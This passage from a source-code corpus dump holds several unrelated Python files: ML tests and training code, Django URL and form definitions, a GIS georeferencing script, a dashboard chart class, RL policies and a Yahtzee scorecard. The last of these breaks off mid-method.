np.ones(shape=(len(vpos), 1))]).reshape(-1)\n model = NaiveBayes621()\n model.fit(X, y)\n y_pred = model.predict(X)\n accuracy = np.sum(y==y_pred) / len(y)\n assert accuracy > 0.97, f\"Correct = {np.sum(y==y_pred)} / {len(y)} = {100*accuracy:.1f}%\"\n\n\ndef test_kfold_621():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n\n X = np.vstack([vneg, vpos])\n y = np.vstack(\n [np.zeros(shape=(len(vneg), 1)), np.ones(shape=(len(vpos), 1))]).reshape(-1)\n model = NaiveBayes621()\n\n accuracies = kfold_CV(model, X, y, k=4)\n true_accuracies = np.array([.836, .80, .806, .786])\n areclose = np.abs(true_accuracies - accuracies) < np.array([.5, .5, .5, .5])\n assert areclose.all(), f\"true accuracies {true_accuracies} and yours {accuracies} differ\"\n\n\ndef test_kfold_sklearn_vs_621():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n\n X = np.vstack([vneg, vpos])\n y = np.vstack([np.zeros(shape=(len(vneg), 1)), np.ones(shape=(len(vpos), 1))]).reshape(-1)\n\n accuracies = kfold_CV(NaiveBayes621(), X, y, k=4)\n\n sklearn_accuracies = kfold_CV(GaussianNB(), X, y, k=4)\n sklearn_true_accuracies = np.array([0.666, 0.678, 0.636, 0.662])\n\n werebetter = (accuracies - sklearn_true_accuracies) > np.array([.1, .1, .1, .1])\n assert werebetter.all(), f\"Your accuracies {accuracies} should be better than sklearn's {sklearn_accuracies}\"","sub_path":"projects/bayes/test_bayes.py","file_name":"test_bayes.py","file_ext":"py","file_size_in_byte":19264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"417095825","text":"\"\"\"homehubpi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url,include\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nfrom . 
import views\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login/$', auth_views.login, name='login'),\n url(r'^logout/$', auth_views.logout, name='logout'),\n url(r'^publisher/$', views.publisher, name='publisher'),\n \n url(r'^rest/', views.rest_set, name='rest'),\n url(r'^test/', views.rest_test, name='test'),\n url(r'^testpub/', views.rest_test_pubkey, name='rest_test_pubkey'),\n \n url(r'^devices/',include('devices.urls', namespace=\"devices\")),\n]\n","sub_path":"homehubpi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"325551154","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/cctyper/xgbtrain.py\n# Compiled at: 2020-04-24 10:15:28\n# Size of source mod 2**32: 7697 bytes\nimport os, sys, re, pandas as pd, itertools as it, numpy as np, xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom cctyper.xgb import XGB\n\nclass XGBTrain(object):\n\n def __init__(self, args):\n self.input = args.input\n self.out = args.output\n self.kmer = args.kmer\n self.minr = args.minr\n self.rnd_seed = args.rnd_seed\n self.test_size = args.test_size\n self.eta = args.eta\n self.threads = args.threads\n self.num_rounds = args.num_rounds\n self.early_stop = args.early_stop\n self.max_depth = args.max_depth\n self.subsample = args.subsample\n self.colsample_bytree = args.colsample_bytree\n self.nfold = args.nfold\n base_for = 'ACGT'\n base_rev = 'TGCA'\n self.comp_tab = str.maketrans(base_for, base_rev)\n self.read_input()\n self.out = os.path.join(self.out, '')\n self.check_out()\n self.prune_input()\n self.prepare_data()\n self.train()\n self.test()\n\n def read_input(self):\n self.dat = pd.read_csv((self.input), header=None, sep='\\t', names=('Type',\n 'Seq'))\n\n def is_dna(s):\n match = re.match('^[ACTGactg]*$', s)\n return match is not None\n\n for rep in list(self.dat['Seq']):\n if not is_dna(rep):\n print('Error - Non-DNA letters found in sequence:')\n print(rep)\n sys.exit()\n\n def check_out(self):\n try:\n os.mkdir(self.out)\n except FileExistsError:\n print('Directory ' + self.out + ' already exists')\n sys.exit()\n\n def prune_input(self):\n subtype, count = np.unique((self.dat['Type']), return_counts=True)\n print('\\x1b[92mCounts of subtypes:\\x1b[0m')\n print(list(zip(subtype, count)))\n self.incl = list(subtype[(count >= self.minr)])\n print('\\x1b[92mIncluding the following subtypes:\\x1b[0m')\n print(self.incl)\n self.label_dict = dict(zip(self.incl, range(len(self.incl))))\n f = open(self.out + 'type_dict.tab', 'w')\n for k, v in self.label_dict.items():\n f.write('{}:{}\\n'.format(k, v))\n else:\n f.close()\n self.dat = self.dat[self.dat['Type'].isin(self.incl)]\n\n def count_kmer(self, seq):\n kmer_d = {}\n for i in range(len(seq) - self.kmer + 1):\n kmer_for = seq[i:i + self.kmer]\n kmer_rev = kmer_for.translate(self.comp_tab)[::-1]\n if kmer_for < kmer_rev:\n kmer = kmer_for\n else:\n kmer = kmer_rev\n if kmer in kmer_d:\n kmer_d[kmer] += 1\n else:\n kmer_d[kmer] = 1\n else:\n return kmer_d\n\n def generate_canonical_kmer(self):\n letters = [\n 'A', 'C', 'G', 'T']\n all_kmer = [''.join(k) for k in it.product(letters, repeat=(self.kmer))]\n all_kmer_rev = [x.translate(self.comp_tab)[::-1] for x in all_kmer]\n can_kmer = 
list(it.compress(all_kmer_rev, [not kf < kr for kf, kr in zip(all_kmer, all_kmer_rev)]))\n can_kmer.sort()\n self.can_kmer = can_kmer\n\n def prepare_data(self):\n self.generate_canonical_kmer()\n X = pd.DataFrame([dict(zip(self.can_kmer, np.zeros(len(self.can_kmer))))] + [self.count_kmer(x) for x in self.dat['Seq']]).fillna(0)\n X = X.iloc[1:]\n y = [self.label_dict[x] for x in self.dat['Type']]\n X = X.reindex((sorted(X.columns)), axis=1)\n X_train, X_test, y_train, self.y_test = train_test_split(X, y, test_size=(self.test_size), random_state=(self.rnd_seed))\n self.dtrain = xgb.DMatrix(X_train, label=y_train)\n self.dtest = xgb.DMatrix(X_test, label=(self.y_test))\n\n def train(self):\n params = {'eta':self.eta, \n 'objective':'multi:softprob', \n 'eval_metric':'mlogloss', \n 'nthread':self.threads, \n 'num_class':len(self.incl)}\n print('\\x1b[92mUsing the following parameters:\\x1b[0m')\n print('eta: {}'.format(self.eta))\n print('num_rounds: {}'.format(self.num_rounds))\n print('early_stopping_rounds: {}'.format(self.early_stop))\n grid_params = [(\n max_depth, subsample, colsample_bytree) for max_depth in self.max_depth for subsample in self.subsample for colsample_bytree in self.colsample_bytree]\n print('\\x1b[92m' + 'Cross-validating with {} folds:'.format(self.nfold) + '\\x1b[0m')\n min_mlogloss = float('Inf')\n best_params = None\n for max_depth, subsample, colsample_bytree in grid_params:\n print('CV with max_depth={}, subsample={}, colsample_bytree={}'.format(max_depth, subsample, colsample_bytree))\n params['max_depth'] = max_depth\n params['subsample'] = subsample\n params['colsample_bytree'] = colsample_bytree\n cv_results = xgb.cv(params,\n (self.dtrain),\n num_boost_round=(self.num_rounds),\n seed=(self.rnd_seed),\n nfold=(self.nfold),\n metrics={\n 'mlogloss'},\n early_stopping_rounds=(self.early_stop))\n mean_mlogloss = cv_results['test-mlogloss-mean'].min()\n boost_rounds = cv_results['test-mlogloss-mean'].argmin()\n print('\\tmlogloss {} for {} rounds'.format(mean_mlogloss, boost_rounds))\n if mean_mlogloss < min_mlogloss:\n min_mlogloss = mean_mlogloss\n best_params = (max_depth, subsample, colsample_bytree, boost_rounds)\n print('Best params: {}, {}, {}, mlogloss: {}'.format(best_params[0], best_params[1], best_params[2], min_mlogloss))\n print('\\x1b[92mTraining final model\\x1b[0m')\n params['max_depth'] = best_params[0]\n params['subsample'] = best_params[1]\n params['colsample_bytree'] = best_params[2]\n self.model = xgb.train(params,\n (self.dtrain),\n num_boost_round=(self.num_rounds),\n evals=[\n (\n self.dtest, 'Test')],\n early_stopping_rounds=(self.early_stop))\n self.boost_rounds = self.model.best_iteration\n self.model.save_model(self.out + 'xgb_repeats.model')\n\n def test(self):\n y_pred = self.model.predict((self.dtest), ntree_limit=(self.boost_rounds))\n conf = confusion_matrix(self.y_test, [x.argmax() for x in y_pred])\n conf_df = pd.DataFrame(conf, columns=(self.incl), index=(self.incl))\n conf_df.to_csv((self.out + 'confusion_matrix.tab'), sep='\\t')\n type_acc = np.diag(conf_df) / conf_df.sum(axis=1)\n print('\\x1b[92mOverall accuracy:\\x1b[0m')\n print(np.diag(conf).sum() / conf.sum())\n print('\\x1b[92mAccuracy per subtype:\\x1b[0m')\n print(type_acc)\n print('\\x1b[92mAdjusted accuracy:\\x1b[0m')\n print(type_acc.mean())","sub_path":"pycfiles/cctyper-1.0.7-py3.8/xgbtrain.cpython-38.py","file_name":"xgbtrain.cpython-38.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"480568032","text":"# -*- coding: utf-8 -*-\n\"\"\"Georeference an HDF5 file for compatibility with GIS and GDAL tools. Needs\nwork.\n\"\"\"\n\nimport json\nimport os\n\nimport click\nimport h5py\n\nfrom osgeo import osr\n\n\n# Help printouts\nFILE_HELP = (\"The path to the target HDF5 file.\")\nPROFILE_HELP = (\"A dictionary containing a `crs` and `geotransform` \"\n \"(or just `transform`) entry representing the coordinate \"\n \"geometries of the target HDF5 datasets.\")\nCRS_HELP = (\"The coordinate reference system of the target HDF5 file. Can be \"\n \"an EPSG code or proj4 string. By default, this will search the \"\n \"file's attributes for a profile dictionary with a `crs` entry.\")\nGEOTRANSFORM_HELP = (\"The geotransformation values of the target HDF5 \"\n \"file datasets in rasterio format. By default, this will \"\n \"search the files' attributes for a dictionary with \"\n \"`transform` or `geotransform` entries:\\n \"\n \"(x-resolution, x-rotation, x-min, y-rotation, \"\n \"y-resolution, y-min)\")\n\n@click.command()\n@click.option(\"--file\", \"-f\", required=True, help=FILE_HELP)\n@click.option(\"--profile\", \"-p\", default=None, help=PROFILE_HELP)\n@click.option(\"--crs\", \"-c\", default=None, help=CRS_HELP)\n@click.option(\"--geotransform\", \"-g\", default=None, help=GEOTRANSFORM_HELP)\ndef main(file, profile, crs, geotransform):\n \"\"\"Georeference an HDF5 file for compatibility with GIS and GDAL tools.\n\n file = \"/shared-projects/rev/projects/duke/data/exclusions/Duke_Exclusions.h5\"\n profile = None\n crs = None\n geotransform = None\n \"\"\"\n\n # Expand file path\n file = os.path.expanduser(file)\n\n # Check for existing georeferencing information if profile not given\n if not profile:\n if not crs or not geotransform:\n with h5py.File(file, \"r\") as h5:\n keys = h5.keys()\n akeys = h5.attrs.keys()\n if \"profile\" in akeys:\n profile = h5.attrs[\"profile\"]\n else:\n # use the first dataset that carries a profile attribute\n for ds in keys:\n if \"profile\" in h5[ds].attrs.keys():\n profile = h5[ds].attrs[\"profile\"]\n break\n else:\n profile = None\n else:\n if not geotransform and crs:\n raise ValueError(\"Not enough information: need Geotransform.\")\n if geotransform and not crs:\n raise ValueError(\"Not enough information: need CRS.\")\n if not geotransform and not crs:\n raise ValueError(\"Not enough information: need CRS and \"\n \"geotransform or a profile dictionary \"\n \"containing both values.\")\n profile = {\"crs\": crs, \"transform\": geotransform}\n\n\n # The profile might be a json\n if isinstance(profile, str):\n profile = json.loads(profile)\n\n # Get the geotransform from the profile\n if \"geotransform\" in profile:\n transform = profile[\"geotransform\"]\n elif \"transform\" in profile:\n transform = profile[\"transform\"]\n else:\n raise KeyError(\"Geotransformation not found.\")\n\n # Now reformat the crs\n crs = profile[\"crs\"]\n spatial_ref = osr.SpatialReference()\n try:\n spatial_ref.ImportFromEPSG(crs)\n except TypeError:\n try: \n code = spatial_ref.ImportFromProj4(crs)\n assert code == 0\n except AssertionError:\n try:\n code = spatial_ref.ImportFromWkt(crs)\n assert code == 0\n except AssertionError:\n print(\"CRS not properly formatted for proj4, epsg, or \"\n \"wkt formats.\")\n raise\n crs = spatial_ref.ExportToWkt()\n\n # Now set these attributes # <-------------------------------------------- In the case of (cannot lock file, resource temporarily unavailable?)\n with h5py.File(file, \"r+\") as h5:\n h5.attrs[\"Projection\"] = crs\n h5.attrs[\"GeoTransform\"] = transform\n\nif 
__name__ == \"__main__\":\n main()\n","sub_path":"revruns/scratch/rrgeoref.py","file_name":"rrgeoref.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"277625675","text":"#! -*- coding:utf-8 -*-\n\n'''\n@Author: ZM\n@Date and Time: 2021/1/3 20:08\n@File: get_dataset.py\n'''\n\nimport random\nfrom pathlib import Path\n\ndef get_dataset(root_dir=r'D:\\datasets\\Tencent-Verification-Code', train_val_split=0.8):\n root_path = Path(root_dir)\n\n X, Y = [], []\n for sub_path in root_path.iterdir():\n dir = sub_path.as_posix()\n label = sub_path.name[:4]\n X.append(dir)\n Y.append(label)\n\n total_samples = len(Y)\n index = [i for i in range(total_samples)]\n random.shuffle(index)\n\n new_X, new_Y = [], []\n for i in index:\n new_X.append(X[i])\n new_Y.append(Y[i])\n \n X, Y = new_X, new_Y\n\n num_train = int(total_samples * train_val_split)\n\n return (X[:num_train], Y[:num_train]), (X[num_train:], Y[num_train:])\n","sub_path":"n_fc/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508248091","text":"from django import forms\n\nfrom .models import Products\n\nclass ProductsForm(forms.Form):\n mytipo = (\n ('GM', 'Console Game'),\n ('YGOC', 'Yugioh Card'),\n ('MGC', 'Magic Card'),\n ('PKMNC', 'Pokémon Card'),\n )\n\n mycardconditions = (\n ('NM','NM'),\n ('LP','LP'),\n ('MP','MP'),\n ('HP','HP'),\n ('D','D'),\n )\n\n myGameconditions = (\n ('Nw','New'),\n ('LN','Like-New'),\n ('US','Used'),\n )\n\n title = forms.CharField(max_length=120, widget=forms.TextInput(attrs={'placeholder':'Digite o nome de seu produto'}))\n price =forms.DecimalField(min_value=0, max_digits=100, decimal_places=2, initial=0.00)\n images = forms.ImageField()\n tipo = forms.ChoiceField(choices= mytipo)\n country = forms.CharField(max_length=120)\n quantity = forms.IntegerField()\n Language = forms.CharField(max_length=120)\n Card_condition = forms.ChoiceField(choices= mycardconditions)\n Game_condition = forms.ChoiceField(choices= myGameconditions)","sub_path":"products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"187244074","text":"from datetime import timedelta\n\nfrom config import settings\nfrom lib.db import DB\n\nclass Title(object):\n _all = []\n\n @classmethod\n def find(cls, lccn):\n for t in cls.all():\n if t.lccn == lccn:\n return t\n\n return NoTitle\n\n @classmethod\n def all(cls):\n if len(cls._all) == 0:\n cls.reload_titles()\n\n return cls._all\n\n @classmethod\n def reload_titles(cls):\n cls._all = []\n rows = DB.fetchall(\"SELECT title, lccn, embargoed, rights FROM titles\")\n for row in rows:\n cls._all.append(Title(**row))\n\n def __init__(self, title, lccn, embargoed, rights):\n self.title = title\n self.lccn = lccn\n self.embargoed = embargoed\n self.embargo_delay = timedelta(days=settings.EMBARGO_DAYS)\n self.copyright = rights\n self.valid = True\n\nNoTitle = Title(\"N/A\", \"N/A\", \"True\", \"N/A\")\nNoTitle.valid = False\nNoTitle.embargo_delay = timedelta(days=1000000)\n","sub_path":"src/lib/models/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19132192","text":"from player import Player\r\nfrom 
project.player import Player\r\n\r\n\r\nclass Guild:\r\n    def __init__(self, name):\r\n        self.guild_name = name\r\n        self.list_of_players = []\r\n\r\n    def assign_player(self, player):\r\n        if player in self.list_of_players:\r\n            return f\"Player {player.name} is already in the guild.\"\r\n        elif player.guild != \"Unaffiliated\":\r\n            return f\"Player {player.name} is in another guild.\"\r\n\r\n        self.list_of_players.append(player)\r\n        player.guild = self.guild_name\r\n        return f\"Welcome player {player.name} to the guild {self.guild_name}\"\r\n\r\n    def kick_player(self, player_name):\r\n        player = next((p for p in self.list_of_players if p.name == player_name), None)\r\n        if player is None:\r\n            return f\"Player {player_name} is not in the guild.\"\r\n\r\n        self.list_of_players.remove(player)\r\n        player.guild = \"Unaffiliated\"\r\n        return f\"Player {player_name} has been removed from the guild.\"\r\n\r\n    # def guild_info(self):\r\n    #     res = f'Guild: {self.guild_name}\\n'\r\n    #     res2 = []\r\n    #     for play_er in self.list_of_players:\r\n    #         res2.append(f\"{Player.player_info(play_er)}\")\r\n    #     res += [\"\\n\".join(str(el)) for el in res2]\r\n    #     return res\r\n    def guild_info(self):\r\n        result = f\"Guild: {self.guild_name}\\n\"\r\n        for play_er in self.list_of_players:\r\n            result += f\"{play_er.player_info()}\"\r\n        return result\r\n\r\n\r\n# player = Player(\"George\", 50, 100)\r\n# print(player.add_skill(\"Shield Break\", 20))\r\n# print(player.player_info())\r\n# guild = Guild(\"UGT\")\r\n# print(guild.assign_player(player))\r\n# print(guild.guild_info())\r\n","sub_path":"defining_classes_exercise/guild_system/project/project/project/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"208282242","text":"from typing import Type, Dict\nimport numpy as np\n\nfrom .core_aggregate import BaseAggregateChart\nfrom ....assets.numba_kernels import calc_value_counts, calc_groupby\nfrom ....datatile import DataTile\nfrom ....layouts import chart_view\nfrom ....assets import geo_json_mapper\n\nclass BaseChoropleth(BaseAggregateChart):\n\n    chart_type: str = 'choropleth'\n    reset_event = None\n    _datatile_loaded_state: bool = False\n    geo_mapper: Dict[str, str] = {}\n    nan_color = 'white'\n    use_data_tiles = True\n\n    @property\n    def datatile_loaded_state(self):\n        return self._datatile_loaded_state\n\n    @datatile_loaded_state.setter\n    def datatile_loaded_state(self, state: bool):\n        self._datatile_loaded_state = state\n        # if self.add_interaction:\n        #     if state:\n        #         self.filter_widget.bar_color = '#8ab4f7'\n        #     else:\n        #         self.filter_widget.bar_color = '#d3d9e2'\n\n    def __init__(self, x, y=None, data_points=100, add_interaction=True, aggregate_fn='count', width=800, height=400, step_size=None, step_size_type=int, geoJSONSource=None, geoJSONProperty=None, geo_color_palette=None, **library_specific_params):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n            x\n            geoJSONSource\n            geoJSONProperty\n            y\n            data_points\n            add_interaction\n            geo_color_palette\n            aggregate_fn\n            width\n            height\n            step_size\n            step_size_type\n            nan_color\n            x_label_map\n            y_label_map\n            **library_specific_params\n        -------------------------------------------\n\n        Output:\n\n        '''\n        self.x = x\n        self.y = y\n        self.data_points = data_points\n        self.add_interaction = add_interaction\n        self.aggregate_fn = aggregate_fn\n\n        if geoJSONSource is None:\n            print(\"geoJSONSource is required for the choropleth map\")\n        else:\n            self.geoJSONSource = geoJSONSource\n\n        self.geo_color_palette = 
geo_color_palette\n        self.geoJSONProperty = geoJSONProperty\n        self.geo_mapper = geo_json_mapper(self.geoJSONSource, self.geoJSONProperty)\n        self.height = height\n        self.width = width\n\n        self.stride = step_size\n        self.stride_type = step_size_type\n\n        self.library_specific_params = library_specific_params\n        if 'nan_color' in self.library_specific_params:\n            self.nan_color = self.library_specific_params['nan_color']\n            self.library_specific_params.pop('nan_color')\n\n    def initiate_chart(self, dashboard_cls):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n            data: cudf DataFrame\n        -------------------------------------------\n\n        Output:\n\n        '''\n        self.min_value = dashboard_cls._data[self.x].min()\n        self.max_value = dashboard_cls._data[self.x].max()\n        if self.stride is None:\n            if self.max_value < 1 and self.stride_type == int:\n                self.stride_type = float\n            self.stride = self.stride_type( (self.max_value - self.min_value)/self.data_points )\n\n        self.calculate_source(dashboard_cls._data)\n        self.generate_chart()\n        self.apply_mappers()\n\n        self.add_events(dashboard_cls)\n\n    def view(self):\n        return chart_view(self.chart, width=self.width)\n\n    def calculate_source(self, data, patch_update=False):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n\n        -------------------------------------------\n\n        Output:\n        '''\n        if self.y == self.x or self.y is None:\n            # it's a histogram\n            df = calc_value_counts(data[self.x].to_gpu_array(), self.data_points)\n        else:\n            df = calc_groupby(self, data)\n\n        dict_temp = {'X':list(df[0].astype(df[0].dtype)), 'Y':list(df[1].astype(df[1].dtype))}\n\n        self.format_source_data(dict_temp, patch_update)\n\n    def get_selection_callback(self, dashboard_cls):\n        '''\n        Description: generate callback for choropleth selection event\n        -------------------------------------------\n        Input:\n\n        -------------------------------------------\n\n        Output:\n        '''\n        def selection_callback(old, new):\n            if dashboard_cls._active_view != self.name:\n                dashboard_cls._reset_current_view(new_active_view=self)\n                dashboard_cls._calc_data_tiles(cumsum=False)\n            dashboard_cls._query_datatiles_by_indices(old, new)\n\n        return selection_callback\n\n    def compute_query_dict(self, query_str_dict):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n            query_dict = reference to dashboard.__cls__.query_dict\n        -------------------------------------------\n\n        Output:\n        '''\n        list_of_indices = self.get_selected_indices()\n        if len(list_of_indices) == 0 or list_of_indices == ['']:\n            query_str_dict.pop(self.name, None)\n        elif len(list_of_indices) == 1:\n            query_str_dict[self.name] = self.x+\"==\"+str(list_of_indices[0])\n        else:\n            indices_string = \",\".join(map(str, list_of_indices))\n            query_str_dict[self.name] = self.x+\" in (\"+indices_string+\")\"\n\n    def add_events(self, dashboard_cls):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n\n        -------------------------------------------\n\n        Output:\n        '''\n        if self.add_interaction:\n            self.add_selection_event(self.get_selection_callback(dashboard_cls))\n        if self.reset_event is not None:\n            self.add_reset_event(dashboard_cls)\n\n    def add_reset_event(self, dashboard_cls):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n\n        -------------------------------------------\n\n        Output:\n        '''\n        def reset_callback(event):\n            if dashboard_cls._active_view != self.name:\n                # reset previous active view and set current chart as active view\n                
dashboard_cls._reset_current_view(new_active_view=self)\n                dashboard_cls._reload_charts()\n\n        # add callback to reset chart button\n        self.add_event(self.reset_event,reset_callback)\n\n    def get_selected_indices(self):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n\n        -------------------------------------------\n\n        Output:\n        '''\n        print('function to be overridden by library specific extensions')\n        return []\n\n    def add_selection_event(self, callback):\n        '''\n        Description:\n\n        -------------------------------------------\n        Input:\n\n        -------------------------------------------\n\n        Output:\n        '''\n\n        print('function to be overridden by library specific extensions')","sub_path":"python/cuXfilter/charts/core/aggregate/core_aggregate_choropleth.py","file_name":"core_aggregate_choropleth.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"192915215","text":"import logging\nimport os\nimport importlib.util\nimport argparse\nimport sys\n\nparser_config = argparse.ArgumentParser()\nparser_config.add_argument(\"-c\", \"--config_path\", help=\"path to configuration file\")\nparser_config.add_argument(\"-m\", \"--module\", help=\"Only for tests\")\nparser_config.add_argument(\"-f\", \"--test_files\", metavar=\"VALUE\", nargs='*', help=\"Only for tests\")\nparser_config.add_argument('-v', \"--unitest_verbose_mode\", nargs='?', help=\"to enable verbose mode of unittest. Only for tests\")\nargs_config = parser_config.parse_args()\n\nlogging.basicConfig(stream=sys.stdout,\n                    level=logging.INFO,\n                    format=\"%(asctime)s - %(pathname)s - %(levelname)s - %(message)s\")\n\n\n_config = dict(\n    # JOBLIB SETTINGS\n    # number of parallel jobs in some tasks such as OCR\n    n_jobs=4,\n\n    # API SETTINGS\n    # max file size in bytes\n    max_content_length=512 * 1024 * 1024,\n    # application port\n    api_port=int(os.environ.get('DOCREADER_PORT', '1231')),\n    static_files_dirs={},\n    recursion_deep_attachments=10,\n    recursion_deep_subparagraphs=30,\n    import_path_init_api_args=\"dedoc.api.api_args\",\n    #\n    logger=logging.getLogger()\n\n    # path to external static files (you may get file from this directory with url\n    # host:port/xturnal_file?fname=\n    # for example if you want send files from /tmp/dedoc directory uncomment the line below\n    # external_static_files_path=\"/tmp/dedoc\",\n\n\n)\n\n\nclass Configuration(object):\n    \"\"\"\n    Pattern Singleton for configuration service\n    INFO: Configuration class and config are created once at the first call\n    \"\"\"\n    __instance = None\n    __config = None\n\n    @classmethod\n    def getInstance(cls) -> \"Configuration\":\n        \"\"\"\n        Actual object creation will happen when we use Configuration.getInstance()\n        \"\"\"\n        if not cls.__instance:\n            cls.__instance = Configuration()\n\n        return cls.__instance\n\n    def __initConfig(self):\n        if args_config.config_path is not None:\n            spec = importlib.util.spec_from_file_location(\"config_module\", args_config.config_path)\n            config_module = importlib.util.module_from_spec(spec)\n            spec.loader.exec_module(config_module)\n            self.__config = config_module._config\n        else:\n            self.__config = _config\n\n    def getConfig(self) -> dict:\n        if self.__config is None:\n            self.__initConfig()\n        return self.__config\n\n\ndef get_config():\n    return Configuration().getConfig()\n","sub_path":"dedoc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"118404680","text":"import numpy as np\nimport bisect\nimport gptd\nimport maze\n\n\nclass SimplePolicy:\n\n def __init__(self, probas):\n self.probas = probas\n\n def draw_action(self, state):\n udraw = np.random.uniform(0, 1)\n cum = np.cumsum(self.probas)\n spot = bisect.bisect(cum, udraw)\n # Explore\n if spot == 8:\n spot = np.random.randint(0, 7)\n return spot\n\n\nclass GreedyImprovedPolicy:\n\n def __init__(self, alpha, C, xdict, kernel, eps, pace=0.1):\n self.alpha = alpha\n self.C = C\n self.eps = eps\n self.pace = pace\n self.xdict = xdict\n self.kernel = kernel\n\n def draw_action(self, state):\n udraw = np.random.uniform(0, 1)\n # Explore\n if udraw > self.eps:\n return np.random.randint(0, 7)\n # Greedy with respect to next values\n else:\n next_states = [maze.Maze.move_coords(state, a, self.pace) for a in range(0, 8)]\n values = [gptd.compute_state_mean_variance(self.xdict, ns, self.alpha, self.C, self.kernel)[0] for ns in next_states]\n return np.argmax(values)\n\n","sub_path":"GPTD/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"366413127","text":"import gi,sys,time,random\ngi.require_version(\"Gtk\",\"3.0\")\nfrom gi.repository import Gtk,Gio,GdkPixbuf\nfrom DiceEnsemble import DiceEnsemble\nfrom YahtzeeBase import Roll\n\nUPPER_KEYS = (\"Ones\",\n \"Twos\",\n \"Threes\",\n \"Fours\",\n \"Fives\",\n \"Sixes\")\n\nLOWER_KEYS = (\"Three of a Kind\",\n \"Four of a Kind\",\n \"Full House\",\n \"Small Straight\",\n \"Large Straight\",\n \"Yahtzee\",\n \"Chance\")\n\nUPPER_SPECIAL_KEYS = (\"Upper Subtotal\",\n \"Bonus\",\n \"Upper Total\")\n\nLOWER_SPECIAL_KEYS = (\"Lower Subtotal\",\n \"Bonus Yahtzee\",\n \"Lower Total\",\n \"Total\")\n\nclass ScoreCard(object):\n\n def __init__(self,window):\n\n self.window = window\n\n self.n_rolls = 0\n self.n_bonus_yahtzees = -1\n self.key = UPPER_KEYS[0]\n\n self.dice_values = {}\n self.values = {}\n self.radio_buttons = {}\n self.score_labels = {}\n self.special_labels = {}\n \n self.dice = DiceEnsemble()\n\n for key in UPPER_KEYS+LOWER_KEYS:\n self.values [key] = -1\n self.dice_values[key] = -1\n if key == UPPER_KEYS[0]:\n self.radio_buttons[key] = Gtk.RadioButton(group=None,label=key)\n else:\n self.radio_buttons[key] = Gtk.RadioButton(group=self.radio_buttons[UPPER_KEYS[0]],label=key)\n self.connect_radio_button(key)\n self.score_labels[key] = Gtk.Label(\"(0)\")\n\n for key in UPPER_SPECIAL_KEYS+LOWER_SPECIAL_KEYS:\n self.special_labels[key] = Gtk.Label(key)\n self.score_labels [key] = Gtk.Label(\"0\")\n\n @property\n def upper_subtotal(self):\n return sum([self.values[key] for key in UPPER_KEYS if self.values[key]>0])\n\n @property\n def bonus(self):\n return 0 if self.upper_subtotal < 63 else 35\n\n @property\n def upper_total(self):\n return self.upper_subtotal + self.bonus\n\n @property\n def lower_subtotal(self):\n return sum([self.values[key] for key in LOWER_KEYS if self.values[key]>0])\n\n @property\n def bonus_yahtzee(self):\n return 100*self.n_bonus_yahtzees if self.n_bonus_yahtzees > 0 else 0\n\n @property\n def lower_total(self):\n return self.lower_subtotal + self.bonus_yahtzee\n\n @property\n def total(self):\n return self.upper_total + self.lower_total\n\n def get_special(self,key):\n key = key.lower().replace(\" \",\"_\")\n return getattr(self,key)\n\n def connect_radio_button(self,key):\n self.radio_buttons[key].connect(\"toggled\",self._on_radio_toggled(key))\n\n def 
